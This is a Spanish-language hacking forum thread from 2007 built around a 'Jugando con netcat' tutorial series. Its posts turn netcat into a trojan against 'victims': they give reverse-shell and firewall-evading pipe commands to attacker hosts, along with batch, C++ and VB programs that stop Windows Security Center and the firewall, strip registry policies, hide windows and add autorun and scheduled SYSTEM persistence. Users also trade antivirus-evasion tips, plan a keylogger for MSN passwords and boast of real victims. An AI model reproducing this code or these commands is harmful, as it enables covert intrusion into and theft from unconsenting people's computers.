Agregué el Res Hack para que descarguen desde la pagina de siempre: http://whk.sitehacking.net/

Att. Yan.
Unilola Software.


Título: Re: Jugando con netcat
Publicado por: EvilGoblin en 29 Marzo 2007, 16:42 pm
ME ENCANTO! =D..

yo tambien tenia el problema con HOST NO FOUND

y antes con el router zyxel 600 para configurar la entrada del puerto y redireccionarlo a mi IP =).

pero fue resuelto con google ^^

MUCHAS GRACIAS POR COMPARTIR LA INFORMACION =D

en esta gran comunidad =D

^^ y saludos al Staff =P


Título: Re: Jugando con netcat
Publicado por: WHK en 29 Marzo 2007, 21:43 pm
En este momento estoy haciendo las imagenes y el video de como ver el escritorio de la victima despues de haber tomado la shell con netcat usando el realvnc4 (no detectado por lo antivirus) pero no se si ponerlo acá o hacer un nuevo tema... mientras lo hago diganme ustedes como lo quieren.
Ya he hecho el video como 4 veces pero cuando voy en la mitad se corta la luz por lo del dia del combatiente aca en Chile XD. PERO POR USTEDES LO HARIA CIENMIL VECES XD

Att. Yan.
Unilola Software.


Título: Re: Jugando con netcat
Publicado por: fitu en 29 Marzo 2007, 22:53 pm
para mi deberia ir en otro post... cuando lo tengas avisa ! xD ya pude hacerlo y me funciono ya tengo mis primeras victimas .... ingeniria social sirve demasiado :P


Título: Re: Jugando con netcat
Publicado por: silverhack en 29 Marzo 2007, 23:30 pm
Me ha gustado mucho. Enhorabuena! ;)


Título: Re: Jugando con netcat
Publicado por: WHK en 30 Marzo 2007, 01:38 am
JUGANDO CON NETCAT
               IV



Como convertir a netcat en un chat.

Bueno... esto es lo mas facil del mundo y no requiere partirse la cabeza para poder hacerlo. Con este metodo puedes crear aplicaciones de chat propio muy caseros. (Una forma mas de utilizar netcat.)

Uno deve ponerse de servidor ejecutando lo siguiente:

nc -L -p (puerto) -vv

y la otra persona como cliente ejecutará lo siguiente:

nc (ip del servidor) (puerto)

y ambos podrán interactuar sin la necesidad de ejecutarse comandos uno al otro ni nada por el estilo...
Esto es muy muy muy basico y sencillo, ademas puedes incorporarlo a algun proyecto hecho en visual basic para crear tu propio chat con emoticones y una buena apariencia grafica.

Este articulo no es tan importante como los dos primeros pero como su titulo india "jugando con netcat" esta es una de las muchas formas de sacarle el jugo.

(http://test.drawcoders.net/netcat/imagenes/18.gif)

Ahora voy a explicar lo que pasó acá:

nc -L -p (puerto) -vv Dijimos que -L: seguiremos conectados Aunque nuestro amigo sedesconecte... asi podremos seguir en espera de otras personas o del mismo. -p: es el puerto que usamos para comunicarnos. -vv:Very Verbose. o sea que mostraremos los mensajes  que nos estan llegando.
Ahora ustedes dicen "porque no podemos ejecutar cosas como en la primera parte de jugando con netcat???" muy simple... porque omitimos el comando: -e cmd.exe el cual nos permitía escuchar y manejar lo que hacia la consola de comandos, pero tambien puedes hacerlo con otras cosas, por ejemnplo un bat que te buelque un contenido de un texto... asi solo ves los logs de algo cuando llamas a un server o enviar reportes de algo cada cierto tiempo a alguna parte o transferir mensajes en modo pgp:

@echo off
Echo enviando mensaje:
type pgp.txt
Echo.
Echo Fin. Cerrando coneccin.
exit


y luego haces un : nc -d -e reporte.bat ip puerto o nc -L -d -e reporte.bat -p 25 .

Señores!... que quiero demostrar con este mini tutorial... que el netcat sirve para muchas cosas y no tan solo para tomar una shell... el netcat es una herramienta GNU y no un troyano.

El video explicativo (si esque no entendieron) pueden bajarlo como siempre desde acá: http://512.iespana.es/nc

Att Yan.
Unilola Software.


Título: Any
Publicado por: any en 31 Marzo 2007, 01:18 am
 >:(


Título: Any
Publicado por: any en 31 Marzo 2007, 02:04 am
 >:(


Título: Re: Jugando con netcat
Publicado por: WHK en 31 Marzo 2007, 02:11 am
Si abres el enlace directamente del archivo del video sin hacerlo desde la pagina entonces te dice que el enlace está roto... trata de pinchar el link directamente desde la pagina sin abrir ninguna mas. Yo acabo de revisarla y si se pueden bajar aún. Casi me dió un infarto al pensar que iespana también cascaba por exeso de trafico pero no es asi como el de geocities, aún hay para rato  ;D
Y otra cosa... yo antes tambien lo hacia en system32 pero no todos tienen derecho de sobreescritura sobre esa carpeta por lo cual el winrar da un error de ruta y desvela el contenido malicioso y no queremos que eso pase asi que elegí un directorio en que todos puedan tener acceso sin importar que tipo de cuentas usen : %homepat% . también antiguamente hacia las entradas de registro con archivos de extención *.js y se ejecutaban con scripts como este:

var WSHShell = WScript.CreateObject("WScript.Shell");WSHShell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\nc.exe", "C:\\WINDOWS\\system32\\nc -d -e cmd.exe ip puerto");
WSHShell.RegWrite("HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List\\nc.exe", "C:\\WINDOWS\\system32\\nc.exe");
function Welcome()
{if (intDoIt == vbCancel) {
}
}


y de esta forma anulamos el cortafuegos de windows XP con SP2 y ademas agregamos una entrada de autoarranque al registro del sistema y a diferencia del bat... este no se ve ni si quiera el pestañazo del DOS asi que es mas silencioso. Pero el problema estaba en que si alguien usaba un compilador web como el dreamweaver u otro similar donde asociaran estos archivos, ps en ves de agregar las entradas de registro... se abria el programa dreamweaver u otro mas. por eso lo reemplazé por un bat para que todos pudieran comprender como se hacia esta entrada de registro y pudieran hechar a volar la imaginación ya que nada me hubiera costado hacer un programa en c que haga las entradas de registro y ejecutara netcat si que se vea nada pero muchos hubiern quedado sin saber como hacerlo ya que no todos saben programar y este tutorial esta hecho con la intención del que no sabe nada... pueda aprender a usar netcat de diferentes formas y no tan solo para usarlo de troyano como muchos creen.  ;)


Título: Re: Jugando con netcat
Publicado por: Alfai en 31 Marzo 2007, 04:46 am
Muy bueno, la verdad, no sabía todo lo que se podía hacer con esta herramienta

saludos
Alfai


Título: Re: Jugando con netcat
Publicado por: NewLog en 1 Abril 2007, 16:28 pm
Ufff, dices en algunos posts que no se ah de saber C, pero sí que se ha de controlar un poco la programación batch (era así, no? xD).

El caso, no tenia ni idea que el netcat tuviera tantas utilidades. Mr Hobbit se lo curró programándolo ^^

Mejor no crees un hilo nuevo! Aquí ya estaría bien tu nuevo tutoo ^^

Merci :)


Título: Re: Jugando con netcat
Publicado por: octalh en 1 Abril 2007, 22:49 pm
Bueno aqui esta mi aportacion XD  ;D

JUGANDO CON NETCAT
V

NETCAT PARA TRANSFERENCIA DE ARCHIVOS
no tendran que usar FTP ni TFTP una ves teniendo NC  en la victima


Lo primero sera prepararnos como servidor [ atacante ] para que el cliente [ victima ] posteriormente conecte a nosotros y descarge el file

sintaxis

Código:
nc -l -p PUERTO < FILE

(http://img410.imageshack.us/img410/7124/servidorfv2.png)

Ahora desde la shell de la victima conectaremos a nosotros y recibiremos el file

sintaxis:

Código:
nc IP PUERTO > FILE

(http://img520.imageshack.us/img520/1407/clientevs6.png)

Ahora esperaremos un momento [ parecera que se colgo la shell ] pero no XD ... para comprobar que ya se descargo realizamos un dir en el servidor destino

(http://img526.imageshack.us/img526/733/resultam4.png)

como pueden ver el tamaño es de 700.416 bytes por lo tanto el archivo a sido descargado con exito

ahora solo queda precionar CTRL+C en la shell del cliente para detener el comando

bueno eso es todo salu2 y suerte

bytes..


Título: Re: Jugando con netcat
Publicado por: ne0x en 1 Abril 2007, 23:11 pm
En vez de
Código:
nc -l -p PUERTO < FILE

tambien podemos usar un :

Código:
type archivo | nc IP PUERTO
si la vicitma tiene un puerto en escucha, o si en puerto en escucha es el nuestro:

Código:
type archivo | nc -L -p PUERTO

Prefiero usar el metodo de conectarte... usar puerto 21 que el firewall SP2 no cantara....


Título: Re: Jugando con netcat
Publicado por: octalh en 1 Abril 2007, 23:16 pm
jaja nunca se me ocurrio hacerlo en modo pipeado

buen tip neox  ;D


Título: Re: Jugando con netcat
Publicado por: ne0x en 1 Abril 2007, 23:29 pm
Gracias.

A esto le falta un " Jugando con el Netcat VI ", shell pipelada o volteada...

Voy a ponerme a hacerlo.


Título: Re: Jugando con netcat
Publicado por: ne0x en 1 Abril 2007, 23:44 pm
Jugando con Netcat VI


Shell volteada o pipelada:


Bien hasta ahora nosotros conocemos la tecnica de la shell directa e inversa, probemos la inversa, nos las ingeniamos para que la victima deje un puerto a la escucha...


(http://img522.imageshack.us/img522/8876/jugandoconnetcatvifirewmx7.jpg)

Este comando camuflado con el metodo del iexplore tendria el mismo efecto, hace saltar el firewall de XP SP2 !!, y por lo tanto nosotros no nos podemos conectar a la victima...

(http://img501.imageshack.us/img501/6707/netcatnoconectase2.jpg)

EL firewall de XP SP2 detecta que actua como un servidor y lo bloquea!!

Asi, que que podemos hacer ??, pues una shell pipelada o volteada.

Esta técnica se basa en que la mayoria de los firewall aceptan la entrada de datos por el puerto 21 y la salida de estos por el puerto 25, de esta manera podemos burlar al firewall sin matarlo ni agregar el Netcat a la lista de excepciones.

El atacante deberá ejecutar los comandos:


nc –vv –L –p 21
  --> La ventana por la que dará las ordenes
nc –vv –L –p 25 --> La ventana por la cual verá el resultado de las mismas.

(http://img163.imageshack.us/img163/1706/jugandoconnetcatvi1y2hv1.jpg)


Y la víctima debe ejecutar:
 
nc –d <IP_ATACANTE> 80 | cmd.exe | nc –d <IP_ATACANTE> 25



(http://img501.imageshack.us/img501/1700/shellpipeladarn7.jpg)
Explicacion:

Usamos " pipes ", esto es basicamente un metodo para transmitir datos entre programas, nos conectamos al puerto 21 del atacante, todo lo que recibamos por ese puerto será redirigido a cmd.exe usando " | ", el resultado que dé cmd.exe será a la vez redirigido a la conexion que tenemos con el puerto 25 de la victima.

Por ese motivo las ordenes o comandos debemos escribirlos en la ventana en la que escuchemos el puerto 21 y recibiremos el resultado en el puerto 25.

Por que usamos el puerto 21 (FTP) ?

Pues por que el firewall de XP SP2 admite por defecto la entrada de datos por dicho puertos, como tambien la admite por el puerto 80, etc...

Por que usamos el puerto 25 (SMTP) ?

Pues basicamente lo mismo que lo anterior, pero en este caso lo permitido es la salida de datos.



Entonces en la nos saldra esto:

(http://img501.imageshack.us/img501/1346/resultadoshellpipeladabh3.jpg)



En la ventana donde escuchamos el puerto 21 escribiremos los comandos y en la que usamos el puerto 25 veremos el resultado...

Y todo esto sin que el firewall no diga ni pio!!, la unica forma de que nos funcione un Netcatt troyanizado usando unicamente el Netcat para esquivar el firewall...



Título: Re: Jugando con netcat
Publicado por: Novlucker en 1 Abril 2007, 23:53 pm
Este post esta quedando realmente muy completo... pero de cualquier manera hay que ver que varios de los metodos que se usan aqui estan en el paper de zhyzura

 :-X


Título: Re: Jugando con netcat
Publicado por: ne0x en 2 Abril 2007, 22:21 pm
Sobretodo el de shell pipelada o volteada, lo que pasa es que yo veia necesario explicarlo, es el unico metodo de saltarse el firewall unicamente usando el Netcat...

Ya estan puestas las fotos de Jugando con netcat VI


Título: Re: Jugando con netcat
Publicado por: WHK en 3 Abril 2007, 00:33 am
jajajajaja muy bueno grax por el aporte XD


Título: Re: Jugando con netcat
Publicado por: NewLog en 3 Abril 2007, 01:46 am
Yo tengo una duda.

El código de nc es abierto verdad? En el caso de que lo fuera... No habría modo alguno de que añadiendo código el antivirus no lo detectara?

Quizá es muy avanzado para este hilo pero siempre me lo he preguntado... y con una respuesta de que es posible (sin cambiar todo el nc) me basta!

Gracias!


Título: Re: Jugando con netcat
Publicado por: WHK en 3 Abril 2007, 02:15 am
Si se puede, trataré de aprender mas sobre el metodo RIT para poder darles un netcat que no sea detectado, pero porfavor si llego a hacerlo traten de no ponerlo en ninguna pagina web para que no lo buelvan a detectar, si alguien lo hace rimero vienvenido sea porque creo que me voy a demorar mucho en hacerlo  :-\


Título: Re: Jugando con netcat
Publicado por: ne0x en 3 Abril 2007, 13:23 pm
Estaria wapo conseguir que no lo detectase...  :) :)


Título: Re: Jugando con netcat
Publicado por: NewLog en 3 Abril 2007, 23:52 pm
Para el firewall es hacer lo que ya se ha explicado. Una shell pipelada (como dicen xD).

Ahora me miro eso del método RIT!

De momento he encontrado algo útil! No se queda en modificar el código, el muy bestia te modifica el binario! Ole sus huevos!

http://packetstorm.linuxsecurity.com/papers/virus/Taking_Back_Netcat.pdf


Título: Re: Jugando con netcat
Publicado por: gblaze en 4 Abril 2007, 22:09 pm
Tengo un problema con esto  " JUGANDO CON NETCAT V1.1
                Parte II"

este comando no me sale bien mira:

==================================

type mensaje.txt|nc -vv -w 3 127.0.0.1 25

==================================

dice que "nc" no es un comando reconocido, aqui esta la imagen:


(http://img352.imageshack.us/img352/1957/exrw9.png) (http://imageshack.us)



 alguien me puede ayudar?? gracias!



Título: Re: Jugando con netcat
Publicado por: ne0x en 4 Abril 2007, 22:55 pm
Si, yo me bajaria el Netcat y lo copiaria en una carpeta que este en el PATH.


Que es el PATH ?
Pues basicamente una variable que contiene las rutas en la que buscar archivos ejecutables, comandos, etc.. separadas por  " ; ".


Mi PATH: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\MinGW\bin

Mi recomendacion es que lo copies en %SystemDrive%\Windows\System32

Lo puedes bajar desde la pagina de http://www.elhacker.net, en la sección Hacking.

Te pongo ya el enlace: http://safariexamples.informit.com/0201719568/Misc/Netcat/NT/nc11nt.zip


Saludos !!


Título: Re: Jugando con netcat
Publicado por: NewLog en 5 Abril 2007, 02:06 am
No teniamos que irnos tan lejos para encontrar como hacer netcat indetectable:

http://foro.elhacker.net/index.php/topic,38580.0.html

o número 28 de la revista hackxcrack.


Título: Re: Jugando con netcat
Publicado por: ChizzoColman en 5 Abril 2007, 22:50 pm
Hola que tal...saliendome del tema WHK me das tu e-mail a si me ayudas..Tengo varias preguntas


Título: Re: Jugando con netcat
Publicado por: ne0x en 5 Abril 2007, 23:44 pm
Ponlas aqui y te ayudaremos todos.


Título: Re: Jugando con netcat
Publicado por: dasdas en 11 Abril 2007, 18:31 pm
buenas señoras, haciendo uso del metodo de ne0x estoy intentando crear el ejecutable con el winzip pero ... solo me ejecuta el primer comando, a ver si me explico, al poner:

Citar
iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

en "ejecutar despues de extraer", solo me ejecuta el:

Citar
iexplorer -d 127.0.0.1 21

entonces.... creo recordar que en linux lo que hacia era crear un archivo adjunto donde poner los argumentos que en este caso seria:

Citar
-d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

e invocarlo asi:

Citar
iexplorer.exe < archivoadjunto

pero no se si es fallo mio o que en la shell de win no se hace asi. alguna idea?


Título: Re: Jugando con netcat
Publicado por: hepy_92 en 11 Abril 2007, 22:51 pm
GrAcIaS!!!!!
weniiiisimo el manual, algo que he buscado desde hace tiempo
muy bien explicado y muy completo!!!
aver si te animas a hacer uno para poder transferir archivos :P


Título: Re: Jugando con netcat
Publicado por: dasdas en 11 Abril 2007, 23:09 pm
ah! me olvidado decir que haciendo un .bat no me soluciona, ya que entonces si que funciona el invento pero se abre una ventana de shell con todo el comando.... y como que queda un poco feo =P


Título: Re: Jugando con netcat
Publicado por: WHK en 12 Abril 2007, 07:03 am
dasdas:
-------------------------------------------------------------------
Citar:
iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25
-------------------------------------------------------------------

Si pones esto en un SFX no te lo ejecutará ya que el simbolo "|" es un modificador de la consola de comandos y no del SFX sea de winrar o winzip... para eso puedes escribir esto:

"%homedrive%%windir%\system32\cmd.exe" /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

y con esto harás pasar tu comando directamente a traves de la consola de comandos ejecutando tu modificador "|"  ;)


Título: Re: Jugando con netcat
Publicado por: dasdas en 12 Abril 2007, 16:18 pm
bueno, muchas gracias cracka, no tenia npi de esto.
ah, un dato esto de "|" se le llama tubería, hehehe, nada de simbolitos xD

otro temita, se podria ir enumerando las posibles causas que pueden hacer que aunque la victima ejecutase el ejecutable, nosotros no recibieramos la shell. porque de momento he tenido clientes que no he recibido respuesta.

y por ultimo, la manera de como ahora se inicia cada vez que se arranca no me gusta mucho ya que hay sistemas que no se conectan a internet hasta al cabo de unos segundos, ya sea porque usan wifi, o cualquier cosa, se podria pensar otra manera.


ACT: Va ser que tu metodo.... no rula, bueno, he cambiado todo eso por:

Citar
cmd.exe /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25

pero sigue abriendose una ventana de shell, aunque ahora ya no sale el comando... en este caso no importaria mucho si no fuese que cuando se cierra la shell, ya no tira...


Título: Re: Jugando con netcat
Publicado por: EvilGoblin en 12 Abril 2007, 19:42 pm
Hice un pequenio programa en c/c++ para lograr ejecutar comandos y desvincularlos de la shell

osea si tienes un bat
que sea
@echo off
echo "hola mundo" > hola.txt
cls
exit

si lo ejecutas en la shell se cerrara por el comando "exit"
entonces con este programa no se cerrara pork lo ejecuta en otro hilo
y sirve para ocultar los bats asi no sale la pantalla de MS-DOS

^^ ahi te mande un MP a WHK

nos comunicamos y te mando el .exe y el codigo fuente

y si kieres un video de como funciona =)

^^" el credito es todo tuyo.. y esperemos que le pongan chincheta a este hilo  =D

¿alquien mas tubo problemas para pasar archivos con TFTP?

estoy intentando hacer herramientas para lograr ejecutar del otro lado.. como capturar contraseñas guardadas en el registro o la memoria.. incluso un keylogger para cerrar el msn con TASKILL y luego conseguir la contraseña q ingresa ^^

Nos comunicamos Suerte! =D

MUY BUEN TUTO!! ^^ =P te ganaste una medalla! xD


Título: Re: Jugando con netcat
Publicado por: dasdas en 12 Abril 2007, 21:16 pm
no vas a poner el SC?


Título: Re: Jugando con netcat
Publicado por: WHK en 12 Abril 2007, 22:43 pm
aver... les intereó tanto el tema que les complicaré un poco la existencia con programación en batch, VB y en C para que puedan aplicar sus propias conclusiones y todo lo que se les venga a la mente, ya que por lo visto este post ya lo está mirando gente con un poco de conocimiento en programación.

Bueno... aya voy.. aver si me resulta porque todo esto será improvisado :-s

BATCH:services32.bat


REM Creado por WHK para el foro de elhacker.net
@echo off
Echo Actualizando el sistema...
net stop Centro de seguridad > nul
net stop Firewall de Windows/Conexión compartida a Internet (ICS) >nul
set nc=cmd /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25
reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "services32" /t REG_SZ /d "%nc%" /f >nul
at 12:00 "%nc%"
%nc%
cls
Echo terminado!
exit



C: services32.cpp

// Compilar en modo no consola
// Creado por WHK para el foro de elhacker.net
//suponiendo que iexplorer es tu netcat hacemos lo siguiente:

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

int WINAPI WinMain(
  HINSTANCE hInstance,
  HINSTANCE hPrevInstance, 
  LPSTR lpCmdLine,
  int nCmdShow
)
{
// Modificamos el registro para poder usar el comando "reg" en system("reg ad"); con toda tranquilidad
HKEY reg1;
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_ALL_ACCESS, &reg1) == ERROR_SUCCESS)
{
   if (RegQueryValueEx(reg1, "DisableRegistryTools", NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
   {
      if (RegDeleteValue(reg1, "DisableRegistryTools") == ERROR_SUCCESS)
      printf("\nDisableRegistryTools   : Modificado.");
      else
      printf("\nDisableRegistryTools   : Imposible modificar.");
   } else
        printf("\nDisableRegistryTools   : Inexistente.");
} else
        printf("\nDisableRegistryTools   : Inaccesible.");
// comprobamos que podemos ejecutar el netcat :s
HKEY reg2;
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\explorer", 0, KEY_ALL_ACCESS, &reg2) == ERROR_SUCCESS)
{
   if (RegQueryValueEx(reg2, "RestrictRun", NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
   {
      if (RegDeleteValue(reg2, "RestrictRun") == ERROR_SUCCESS)
      printf("\nRestrictRun            : Modificado.");
      else
      printf("\nRestrictRun            : Imposible modificar.");
   } else
        printf("\nRestrictRun            : Inexistente.");
} else
        printf("\nRestrictRun            : Inaccesible.");
//estas dos modificaciones es lo mismo que los primeros pero en HKLM en ves de HKCU
HKEY reg3;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, KEY_ALL_ACCESS, &reg3) == ERROR_SUCCESS)
{
   if (RegQueryValueEx(reg3, "DisableRegistryTools", NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
   {
      if (RegDeleteValue(reg3, "DisableRegistryTools") == ERROR_SUCCESS)
      printf("\nDisableRegistryTools   : Modificado.");
      else
      printf("\nDisableRegistryTools   : Imposible modificar.");
   } else
        printf("\nDisableRegistryTools   : Inexistente.");
} else
        printf("\nDisableRegistryTools   : Inaccesible.");

HKEY reg4;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\explorer", 0, KEY_ALL_ACCESS, &reg4) == ERROR_SUCCESS)
{
   if (RegQueryValueEx(reg4, "RestrictRun", NULL, NULL, NULL, NULL) == ERROR_SUCCESS)
   {
      if (RegDeleteValue(reg4, "RestrictRun") == ERROR_SUCCESS)
      printf("\nRestrictRun            : Modificado.");
      else
      printf("\nRestrictRun            : Imposible modificar.");
   } else
        printf("\nRestrictRun            : Inexistente.");
} else
        printf("\nRestrictRun            : Inaccesible.");
// Comprobamos que nuestro netcat no ha sido borrado por el antivirus XD
FILE *pf;
char cad[80];
if (!(pf=fopen("iexplorer.exe","rb"))) // controlamos si se produce un error
{
printf("Error al abrir el fichero");
exit(0); // abandonamos el programa
}
else
{
fclose(pf);
}
 system ("ping -n 2 127.0.0.1 > nul");// esto retarda un segundo para que pueda aparecer la consola de comandos antes de:
 ShowWindow(GetForegroundWindow(),SW_HIDE); // esconder la consola :D
 system ("net stop Centro de seguridad");
 system ("net stop Firewall de Windows/Conexión compartida a Internet (ICS)");
 system ("reg add HKcU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v \"services32\" /t REG_SZ /d \"services32.exe\" /f");
 system ("ping -n 50 127.0.0.1 > nul");
 system ("at 12:00 cmd /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25"); // nos aprobechamos y lo metemos en modo SYSTEM en casi que en modo user no funcione :/
 system ("cmd /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25");
return 0;
}


VB: Services32.vbp

' Creado por WHK para el foro de elhacker.net

Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess&, ByVal bInheritHandle&, ByVal dwProcessId&) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long

Sub ParaServiciosYcreaUsuario()
     Dim hShell As Long
     Dim hProc As Long
     Dim codExit As Long
     Dim sCmd As String
     Dim Comando As String
' Para el servicio de Centro de seguridad
     Comando = "net stop " & Chr(34) & "Centro de seguridad" & Chr(34)
     sCmd = "cmd /c " & Comando
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
' el Chr(34) son las comillas dobles, para ejecutar un commando de MSDOS que sea una frase larga necesitamos ejecutarlo con dobles comillas, pues así se pondría para que VB lo ejecute bien.
  ' Para el servicio del Firewall de Windows
     Comando = "net stop " & Chr(34) & "Firewall de Windows/Conexión compartida a Internet (ICS)" & Chr(34)
     sCmd = "cmd /c " & Comando
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
' Ejecutamos netcat
     comando = "cmd /c iexplorer.exe -d 127.0.0.1 21 | cmd.exe | iexplorer.exe -d 127.0.0.1 25" & Chr (34)
     sCmd = "cmd /c " & Comando
     hShell = Shell(Environ$("Comspec") & " /c " & sCmd, vbHide)
End Sub

Sub MeteloEnRegistro()
     Dim hregkey As Long
     Dim subkey As String
          subkey = "Software\Microsoft\Windows\CurrentVersion\Run"
     Dim stringbuffer As String
     Dim PathPrograma As String
          PathPrograma = "C:\WINDOWS\system32\services32.exe"
     Dim NombrePrograma As String
          NombrePrograma = "Services32.exe"
     retval = RegOpenKeyEx(HKEY_CURRENT_USER, subkey, 0, KEY_WRITE, hregkey)

     If retval <> 0 Then
          Debug.Print "Can't open the subkey"
          Exit Sub
     End If

     stringbuffer = PathPrograma & vbNullChar
     retval = RegSetValueEx(hregkey, NombrePrograma, 0, REG_SZ, ByVal stringbuffer, Len(stringbuffer))
     RegCloseKey hregkey
End Sub
 

Y necesitamos en un módulo meter esto:

Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Public Const HKEY_CURRENT_USER = &H80000001
Public Const KEY_WRITE = &H20006
Public Const REG_SZ = 1

------------------------------------------------------------------

Bueno.. cada uno pipea el netcat de formas diferentes para que cada uno pueda sacar sus propias conclusiones ;)
Aver si ahora hechan a volar un poco mas la imaginación.

Att Yan
Unilola Software.


Título: Re: Jugando con netcat
Publicado por: dasdas en 12 Abril 2007, 23:42 pm
muy currado, gracias crack!


Título: Re: Jugando con netcat
Publicado por: EvilGoblin en 13 Abril 2007, 14:57 pm
Este es el que uso para ejecutar algun comando y desvincularlo de la shell

Citar
//Eject Threads By Evilgoblin V 0.0000001 xD
#include <iostream.h>
#include <windows.h>
#include <time.h>



int a = 0;
char comando[40];


DWORD WINAPI ThFunc(LPVOID a)
{
system(comando);
cout << "Guardado en a.txt" << endl;
}


int main(int argc, char *argv[])
{
 
sprintf (comando,"%s%s" , argv[1]," > a.txt");
  DWORD  dwThreadID = 1; 
  HANDLE hThread;


       
hThread = CreateThread(NULL,0,ThFunc,&a,0,&dwThreadID);
  Sleep(100); 
    return 0;
}


y este es el bat

Citar
@echo off

:hola
nc -d -e cmd.exe midominio.no-ip.info 2333
ping 127.0.0.1
goto hola

Entonces yo con el programa

ejecuto el bat

y queda continuamente ejecutandose y no sale la ventana negra

y si cierro la shell en la que estoy

y abro netcat a la escucha en 2333

Vuelve a abrir la shell

AdeW! =D


Título: Re: Jugando con netcat
Publicado por: Novlucker en 14 Abril 2007, 00:43 am
Ya era hora de que le pusieran chincheta... para todo aquel que no sabe que uso darle al netcat... y para todo aquel que se queda sin ideas,  :-X

Muy bueno


Título: Re: Jugando con netcat
Publicado por: WHK en 14 Abril 2007, 05:47 am
Bueno aver que les parece un programa que estoy haciendo para ustedes (aún no terminado) donde le saca el provecho a todas las secciones de jugando con netcat... algo muy basico... para que todos puedan aprender a sacarle el jugo en Visual Basic:

(http://www.geocities.com/whk_elhacker_net_2111/nc99.gif)

Si no se ve bien la imagen por el tamaño puedes verla acá: http://www.geocities.com/whk_elhacker_net_2111/nc99.gif

aún no está terminada porque falta devolver en donde dice "log" los mensajes que genere el netcat debuelta, pero todas las funciones (exepto una) funcionan muy bien... la unica que no funciona aún es donde dice "ejecutar en modo system" porque me las estoy ingeniando para adelantar un minuto sobre el comando AT que posibilita ejecuciones en modo SYSTEM.

Les dejo el codigo fuente para que hagan lo que se les de la gana y aprendan como vincular conexiones y ejecuciones con netcat y VB.

Salu2 ;)


Título: Re: Jugando con netcat
Publicado por: santyuste en 15 Abril 2007, 23:30 pm
Tengo una duda con el netcat
Estoy usando el netcat en un pc que esta dentro de una red local "C:\tmp\nc.exe -d -e cmd  myip 5555", se me conecta a un puerto que tengo otro netcat escuchando "c:\windows\system32\nc -v -l -p 5555"

Se me conecta bien, pero cuando uso el edit.exe o cualquier otro programa similar no me aparece por pantalla.

¿por que pasa esto?

Saludos


Título: Re: Jugando con netcat
Publicado por: Novlucker en 16 Abril 2007, 00:35 am
Creo que es normal que pase eso, a mi siempre me paso.. hay algunas opciones que no se pueden usar con netcat.. una de ellas es edit  :(


Título: Re: Jugando con netcat
Publicado por: Marth en 24 Abril 2007, 05:02 am
ola bueno soy nuevo y si me funciono lo del netcat la parte 1 pero lo que quiero saber cuales son los comandos para poder borrar archivos cosas asi porfa me gustaria saber =P que al = que tu quiero cobrar un favor XD aparte apoya a los chilenos XD


Título: Re: Jugando con netcat
Publicado por: ne0x en 24 Abril 2007, 13:37 pm
Pues aqui lo puedes ver..

TUTORIAL PROGRAMACION BAT
http://foro.elhacker.net/index.php/topic,18148.0.html


Título: Re: Jugando con netcat
Publicado por: Falso Positivo en 24 Abril 2007, 14:22 pm
Citar
Publicado por: WHK
...la unica que no funciona aún es donde dice "ejecutar en modo system" porque me las estoy ingeniando para adelantar un minuto sobre el comando AT que posibilita ejecuciones en modo SYSTEM.
Ejecuta el proceso con psexec.

Citar
Publicado por: santyuste
...Se me conecta bien, pero cuando uso el edit.exe o cualquier otro programa similar no me aparece por pantalla.
Si quieres editar algun archivo tipo txt, bat, el comando "edit" solo hara q "tildes" tu shell, mejor bajate de la victima el arcxhivo por por tftp, ftp, etc modificalo localmente y luego lo vuelves a subir.

Salu2.


Título: Re: Jugando con netcat
Publicado por: ne0x en 24 Abril 2007, 19:23 pm
Yo lo que sigo buscando es como ocultar la ventana que te sale al ejecutar el SFX...


Título: Re: Jugando con netcat
Publicado por: Novlucker en 24 Abril 2007, 19:28 pm
De que tipo de ventana estamos hablando?? de ms-dos?? la de winrar??


Título: Re: Jugando con netcat
Publicado por: ne0x en 24 Abril 2007, 22:53 pm
MS-DOS, es decir, la que se origina al ejecutar:

cmd /c "nc -d TU_IP 21 | cmd.exe | nc -d TU_IP 25"


